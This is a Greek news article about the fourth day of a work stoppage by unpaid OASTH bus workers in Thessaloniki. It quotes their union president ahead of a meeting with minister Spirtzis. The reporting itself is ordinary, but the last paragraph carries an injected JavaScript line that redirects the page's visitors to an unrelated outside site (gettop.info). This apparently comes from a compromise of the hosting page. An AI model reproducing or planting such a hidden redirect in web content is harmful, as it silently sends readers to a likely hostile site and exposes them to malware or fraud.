Για τέταρτη ημέρα σε επίσχεση οι εργαζόμενοι του ΟΑΣΘ – Συνάντηση με Σπίρτζη

0
10

 

Συνεχίζεται για τέταρτη ημέρα η επίσχεση από τους εργαζομένους στον ΟΑΣΘ με αποτέλεσμα να μην κυκλοφορούν αστικά λεωφορεία στους δρόμους της Θεσσαλονίκης.

Σήμερα, αναμένεται η κρίσιμη συνάντηση των εργαζομένων του Οργανισμού με τον υπουργό Υποδομών Χρήστο Σπίρτζη.

Οι εργαζόμενοι βρίσκονται σε επίσχεση εργασίας από τις 17 Σεπτεμβρίου 2016, διεκδικώντας δεδουλευμένα δύο μηνών, Ιουλίου και Αυγούστου, ύψους άνω των 6 εκατ. ευρώ.

Στο μεταξύ, με συνέντευξή του στο “Πρακτορείο 104,9 fm” ο πρόεδρος των εργαζομένων στον ΟΑΣΘ, Δημήτρης Τσερμενίδης σημείωσε πως το νωρίτερο που μπορεί να έχουμε αστικές συγκοινωνίες στη Θεσσαλονίκη είναι η Πέμπτη το πρωί.

«Είμαστε αισιόδοξοι για τη σημερινή συνάντηση, πιστεύουμε πως θα βρεθεί η χρυσή τομή ώστε να τελειώσουν τα ζητήματα που ταλανίζουν και τον Οργανισμό και τους κατοίκους του νομού Θεσσαλονίκης από πλευράς εξυπηρέτησης αλλά και τους εργαζόμενους που είναι απλήρωτοι δύο μήνες και πλέον» είπε και συμπλήρωσε:

«Εμείς αυτό που θέλουμε είναι να δουλέψουμε και να πληρωνόμαστε» τονίζοντας πως και οι εργαζόμενοι έχουν καταθέσει προτάσεις ώστε να «βρεθεί η λύση» και να προχωρήσουν «άμεσα στη διαδικασία εξυπηρέτησης του επιβατικού κοινού».

Ως προς το ζήτημα της επίλυσης των διαφορών γενικότερα αλλά και το μέλλον της λειτουργίας του ΟΑΣΘ, ο κ. Τσερμενίδης σημείωσε: «Πρέπει να ληφθούν σοβαρά οι προτάσεις, μια επιτροπή να προσδιορίσει την πορεία του ΟΑΣΘ και με τους ισχύοντες νόμους. Αν πραγματικά η κυβέρνηση θέλει κάτι να αλλάξει να το δούμε, να το εκτιμήσουμε και να προχωρήσουμε μαζί με τη συνεργασία και της διοίκησης του Οργανισμού και των εκπροσώπων των συναρμόδιων υπουργείων».

Για τη συμφωνία και τη συνεργασία του Ελληνικού Δημοσίου με τον ΟΑΣΘ και το μέλλον της ο πρόεδρος των εργαζομένων του ΟΑΣΘ τόνισε: «Όταν ένα δημόσιο χρωστά σε έναν Οργανισμό 130 και πλέον εκατομμύρια δεν μπορεί να προχωρήσει» και συμπλήρωσε πως «όταν σταματήσει η επιδότηση σταματάει και το έργο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here